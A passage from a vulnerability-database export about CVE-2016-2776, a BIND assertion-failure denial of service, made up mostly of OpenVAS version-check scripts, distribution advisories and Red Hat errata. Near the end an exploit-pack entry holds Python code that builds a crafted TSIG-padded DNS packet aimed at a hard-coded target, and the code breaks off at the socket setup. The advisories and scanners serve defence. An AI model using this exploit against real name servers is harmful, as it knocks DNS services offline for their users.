SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120740\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2016-10-26 15:38:26 +0300 (Wed, 26 Oct 2016)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2016-751)\");\n script_tag(name:\"insight\", value:\"A denial of service flaw was found in the way BIND constructed a response to a query that met certain criteria. A remote attacker could use this flaw to make named exit unexpectedly with an assertion failure via a specially crafted DNS request packet.\");\n script_tag(name:\"solution\", value:\"Run yum update bind to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2016-751.html\");\n script_cve_id(\"CVE-2016-2776\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.8.2~0.37.rc1.48.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-debuginfo\", rpm:\"bind-debuginfo~9.8.2~0.37.rc1.48.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-sdb\", rpm:\"bind-sdb~9.8.2~0.37.rc1.48.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.8.2~0.37.rc1.48.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.8.2~0.37.rc1.48.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.8.2~0.37.rc1.48.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.8.2~0.37.rc1.48.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-12-11T19:28:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2776"], "description": "The host is installed with ISC BIND and is\n prone to denial of service vulnerability.", "modified": "2019-12-10T00:00:00", "published": "2017-01-06T00:00:00", "id": "OPENVAS:1361412562310810263", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810263", "type": "openvas", "title": "ISC BIND 'buffer.c' Assertion Failure Denial of Service Vulnerability (Linux)", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# ISC BIND 'buffer.c' Assertion Failure Denial of Service Vulnerability (Linux)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:isc:bind\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810263\");\n script_version(\"2019-12-10T15:03:15+0000\");\n script_cve_id(\"CVE-2016-2776\");\n script_bugtraq_id(93188);\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-10 15:03:15 +0000 (Tue, 10 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-01-06 12:10:51 +0530 (Fri, 06 Jan 2017)\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_name(\"ISC BIND 'buffer.c' Assertion Failure Denial of Service Vulnerability (Linux)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with ISC BIND and is\n prone to denial of service vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to the 'buffer.c' script\n in named in ISC BIND does not properly construct responses.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to cause a denial of service (assertion failure and daemon exit)\n via a crafted query.\");\n\n script_tag(name:\"affected\", value:\"ISC BIND 9 before 9.9.9-P3, 9.10.x before\n 9.10.4-P3, and 9.11.x before 9.11.0rc3.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to ISC BIND version 9.9.9-P3 or\n 9.10.4-P3 or 9.11.0rc3 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://kb.isc.org/docs/aa-01419\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"bind_version.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"isc/bind/detected\", \"Host/runs_unixoide\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"revisions-lib.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! infos = get_app_version_and_proto( cpe:CPE, port:port ) ) exit( 0 );\n\nversion = infos[\"version\"];\nproto = infos[\"proto\"];\n\nif(version =~ \"^9\\.[0-9]\\.\")\n{\n if(revcomp(a: version, b: \"9.9.9p3\") < 0)\n {\n fix = \"9.9.9-P3\";\n VULN = TRUE;\n }\n}\n\nelse if(version =~ \"^9\\.10\")\n{\n if(revcomp(a: version, b: \"9.10.4p3\") < 0)\n {\n fix = \"9.10.4-P3\";\n VULN = TRUE;\n }\n}\n\nelse if(version =~ \"^9\\.11\")\n{\n if(revcomp(a: version, b: \"9.11.0rc3\") < 0)\n {\n fix = \"9.11.0rc3\";\n VULN = TRUE;\n }\n}\n\nif(VULN)\n{\n report = report_fixed_ver(installed_version:version, fixed_version:fix);\n security_message(data:report, port:port, proto:proto);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:35:16", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2776"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-11-14T00:00:00", "id": "OPENVAS:1361412562310809926", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809926", "type": "openvas", "title": "Fedora Update for bind FEDORA-2016-3af8b344f1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for bind FEDORA-2016-3af8b344f1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809926\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-11-14 18:01:08 +0530 (Mon, 14 Nov 2016)\");\n script_cve_id(\"CVE-2016-2776\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for bind FEDORA-2016-3af8b344f1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bind'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"bind on Fedora 23\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-3af8b344f1\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HDNJ7526HIGRP3XBNHML2EVUZLK6EG4Y\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC23\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC23\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.10.4~2.P3.fc23\", rls:\"FC23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-01-31T18:35:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2776"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2016-09-29T00:00:00", "id": "OPENVAS:1361412562310851398", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851398", "type": "openvas", "title": "openSUSE: Security Advisory for bind (openSUSE-SU-2016:2406-1)", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851398\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-09-29 05:43:55 +0200 (Thu, 29 Sep 2016)\");\n script_cve_id(\"CVE-2016-2776\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for bind (openSUSE-SU-2016:2406-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bind'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The nameserver bind was updated to fix a remote denial of service\n vulnerability, where a crafted packet could cause the nameserver to abort.\n (CVE-2016-2776, bsc#1000362)\n\n This update was imported from the SUSE:SLE-12-SP1:Update update project.\");\n\n script_tag(name:\"affected\", value:\"bind on openSUSE Leap 42.1, openSUSE 13.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2016:2406-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE13\\.2\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE13.2\")\n{\n\n if(!isnull(res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.9.6P1~2.22.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-chrootenv\", rpm:\"bind-chrootenv~9.9.6P1~2.22.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-debuginfo\", rpm:\"bind-debuginfo~9.9.6P1~2.22.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-debugsource\", rpm:\"bind-debugsource~9.9.6P1~2.22.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.9.6P1~2.22.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.9.6P1~2.22.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-libs-debuginfo\", rpm:\"bind-libs-debuginfo~9.9.6P1~2.22.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-lwresd\", rpm:\"bind-lwresd~9.9.6P1~2.22.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-lwresd-debuginfo\", rpm:\"bind-lwresd-debuginfo~9.9.6P1~2.22.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.9.6P1~2.22.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-utils-debuginfo\", rpm:\"bind-utils-debuginfo~9.9.6P1~2.22.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-doc\", rpm:\"bind-doc~9.9.6P1~2.22.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-libs-32bit\", rpm:\"bind-libs-32bit~9.9.6P1~2.22.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-libs-debuginfo-32bit\", rpm:\"bind-libs-debuginfo-32bit~9.9.6P1~2.22.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "freebsd": [{"lastseen": "2019-05-29T18:32:31", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2776"], "description": "\nISC reports:\n\nTesting by ISC has uncovered a critical error condition\n\t which can occur when a nameserver is constructing a\n\t response. A defect in the rendering of messages into\n\t packets can cause named to exit with an assertion\n\t failure in buffer.c while constructing a response\n\t to a query that meets certain criteria.\n\n", "edition": 7, "modified": "2016-10-10T00:00:00", "published": "2016-09-27T00:00:00", "id": "C8D902B1-8550-11E6-81E7-D050996490D0", "href": "https://vuxml.freebsd.org/freebsd/c8d902b1-8550-11e6-81e7-d050996490d0.html", "title": "BIND -- Remote Denial of Service vulnerability", "type": "freebsd", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "slackware": [{"lastseen": "2020-10-25T16:36:11", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2776"], "description": "New bind packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1,\n14.2, and -current to fix a security issue.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/bind-9.10.4_P3-i586-1_slack14.2.txz: Upgraded.\n This update fixes a denial-of-service vulnerability. Testing by ISC has\n uncovered a critical error condition which can occur when a nameserver is\n constructing a response. A defect in the rendering of messages into\n packets can cause named to exit with an assertion failure in buffer.c while\n constructing a response to a query that meets certain criteria.\n For more information, see:\n https://kb.isc.org/article/AA-01419/0\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2776\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/bind-9.9.9_P3-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/bind-9.9.9_P3-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/bind-9.9.9_P3-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/bind-9.9.9_P3-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/bind-9.9.9_P3-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/bind-9.9.9_P3-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/bind-9.9.9_P3-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/bind-9.9.9_P3-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/bind-9.9.9_P3-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/bind-9.9.9_P3-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/bind-9.10.4_P3-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/bind-9.10.4_P3-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/bind-9.10.4_P3-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/bind-9.10.4_P3-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 13.0 package:\nab51d9ac6707b0bfd5c93cbcad7f4781 bind-9.9.9_P3-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\nd9e28b1579217f4007f621237771ebef bind-9.9.9_P3-x86_64-1_slack13.0.txz\n\nSlackware 13.1 package:\nde4f0a1f2fb41df7a18f80b5f2fd6ea0 bind-9.9.9_P3-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\n39dc9476268fddc108527556e54511a1 bind-9.9.9_P3-x86_64-1_slack13.1.txz\n\nSlackware 13.37 package:\n73c0b3bfa6a0f049e9765e34f95a7659 bind-9.9.9_P3-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 package:\ndd772fed4ab33f83290400ea6a803895 bind-9.9.9_P3-x86_64-1_slack13.37.txz\n\nSlackware 14.0 package:\ne3c00b78b92de59451e39a61d00d8b37 bind-9.9.9_P3-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\nbaf936532b15bccd2b1cdfa5c400619c bind-9.9.9_P3-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\n11031ad0191333afaf0fc8225aca5464 bind-9.9.9_P3-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\nf4ce795b56bc3e21ace27aff01e91194 bind-9.9.9_P3-x86_64-1_slack14.1.txz\n\nSlackware 14.2 package:\nc8b239b473edf073cbac5863aa6f1038 bind-9.10.4_P3-i586-1_slack14.2.txz\n\nSlackware x86_64 14.2 package:\n7207ababf09ad1788446d2aba78aa9db bind-9.10.4_P3-x86_64-1_slack14.2.txz\n\nSlackware -current package:\n14c4becc3dc41398ecc99c82818f3d67 n/bind-9.10.4_P3-i586-1.txz\n\nSlackware x86_64 -current package:\nb11c33727c0eb6525df942f54befd5ff n/bind-9.10.4_P3-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg bind-9.10.4_P3-i586-1_slack14.2.txz\n\nThen, restart the name server:\n\n > /etc/rc.d/rc.bind restart", "modified": "2016-09-27T19:49:07", "published": "2016-09-27T19:49:07", "id": "SSA-2016-271-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.568983", "type": "slackware", "title": "[slackware-security] bind", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:46:45", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2776"], "description": "The Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name\nSystem (DNS) protocols. BIND includes a DNS server (named); a resolver library\n(routines for applications to use when interfacing with DNS); and tools for\nverifying that the DNS server is operating correctly.\n\nSecurity Fix(es):\n\n* A denial of service flaw was found in the way BIND constructed a response to a\nquery that met certain criteria. A remote attacker could use this flaw to make\nnamed exit unexpectedly with an assertion failure via a specially crafted DNS\nrequest packet. (CVE-2016-2776)\n\nRed Hat would like to thank ISC for reporting this issue.\n", "modified": "2017-09-08T12:17:51", "published": "2016-09-28T04:00:00", "id": "RHSA-2016:1945", "href": "https://access.redhat.com/errata/RHSA-2016:1945", "type": "redhat", "title": "(RHSA-2016:1945) Important: bind97 security update", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-08-13T18:44:41", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2776"], "description": "The Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name\nSystem (DNS) protocols. BIND includes a DNS server (named); a resolver library\n(routines for applications to use when interfacing with DNS); and tools for\nverifying that the DNS server is operating correctly.\n\nSecurity Fix(es):\n\n* A denial of service flaw was found in the way BIND constructed a response to a\nquery that met certain criteria. A remote attacker could use this flaw to make\nnamed exit unexpectedly with an assertion failure via a specially crafted DNS\nrequest packet. (CVE-2016-2776)\n\nRed Hat would like to thank ISC for reporting this issue.\n", "modified": "2018-06-06T20:24:24", "published": "2016-09-28T04:00:00", "id": "RHSA-2016:1944", "href": "https://access.redhat.com/errata/RHSA-2016:1944", "type": "redhat", "title": "(RHSA-2016:1944) Important: bind security update", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-08-13T18:45:50", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2776", "CVE-2016-2848"], "description": "The Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly.\n\nSecurity Fix(es):\n\n* A denial of service flaw was found in the way BIND constructed a response to a query that met certain criteria. A remote attacker could use this flaw to make named exit unexpectedly with an assertion failure via a specially crafted DNS request packet. (CVE-2016-2776)\n\n* A denial of service flaw was found in the way BIND handled packets with malformed options. A remote attacker could use this flaw to make named exit unexpectedly with an assertion failure via a specially crafted DNS packet. (CVE-2016-2848)\n\nRed Hat would like to thank ISC for reporting CVE-2016-2776.", "modified": "2016-10-25T11:46:18", "published": "2016-10-25T11:38:10", "id": "RHSA-2016:2099", "href": "https://access.redhat.com/errata/RHSA-2016:2099", "type": "redhat", "title": "(RHSA-2016:2099) Important: bind security update", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:20", "description": "\nISC BIND 9 - Denial of Service", "edition": 1, "published": "2016-10-04T00:00:00", "title": "ISC BIND 9 - Denial of Service", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-2776"], "modified": "2016-10-04T00:00:00", "id": "EXPLOITPACK:09762DB0197BBAAAB6FC79F24F0D2A74", "href": "", "sourceData": "import socket\nimport struct\n\nTARGET = ('192.168.200.10', 53)\n\nQ_A = 1\nQ_TSIG = 250\nDNS_MESSAGE_HEADERLEN = 12\n\n\ndef build_bind_nuke(question=\"\\x06google\\x03com\\x00\", udpsize=512):\n query_A = \"\\x8f\\x65\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x01\" + question + int16(Q_A) + \"\\x00\\x01\"\n\n sweet_spot = udpsize - DNS_MESSAGE_HEADERLEN + 1\n tsig_rr = build_tsig_rr(sweet_spot)\n\n return query_A + tsig_rr\n\ndef int16(n):\n return struct.pack(\"!H\", n)\n\ndef build_tsig_rr(bind_demarshalled_size):\n signature_data = (\"\\x00\\x00\\x57\\xeb\\x80\\x14\\x01\\x2c\\x00\\x10\\xd2\\x2b\\x32\\x13\\xb0\\x09\"\n \"\\x46\\x34\\x21\\x39\\x58\\x62\\xf3\\xd5\\x9c\\x8b\\x8f\\x65\\x00\\x00\\x00\\x00\")\n tsig_rr_extra_fields = \"\\x00\\xff\\x00\\x00\\x00\\x00\"\n\n necessary_bytes = len(signature_data) + len(tsig_rr_extra_fields)\n necessary_bytes += 2 + 2 # length fields\n\n # from sizeof(TSIG RR) bytes conforming the TSIG RR\n # bind9 uses sizeof(TSIG RR) - 16 to build its own\n sign_name, algo_name = generate_padding(bind_demarshalled_size - necessary_bytes + 16)\n\n tsig_hdr = sign_name + int16(Q_TSIG) + tsig_rr_extra_fields\n tsig_data = algo_name + signature_data\n return tsig_hdr + int16(len(tsig_data)) + tsig_data\n\ndef generate_padding(n):\n max_per_bucket = [0x3f, 0x3f, 0x3f, 0x3d, 0x3f, 0x3f, 0x3f, 0x3d]\n buckets = [1] * len(max_per_bucket)\n\n min_size = len(buckets) * 2 + 2 # 2 bytes for every bucket plus each null byte\n max_size = sum(max_per_bucket) + len(buckets) + 2\n\n if not(min_size <= n <= max_size):\n raise RuntimeException(\"unsupported amount of bytes\")\n\n curr_idx, n = 0, n - min_size\n while n > 0:\n next_n = max(n - (max_per_bucket[curr_idx] - 1), 0)\n buckets[curr_idx] = 1 + n - next_n\n n, curr_idx = next_n, curr_idx + 1\n\n n_padding = lambda amount: chr(amount) + \"A\" * amount\n stringify = lambda sizes: \"\".join(map(n_padding, sizes)) + \"\\x00\"\n\n return stringify(buckets[:4]), stringify(buckets[4:])\n\nif __name__ == \"__main__\":\n bombita = build_bind_nuke()\n\n s = socket.socket(socket.AF_INET, 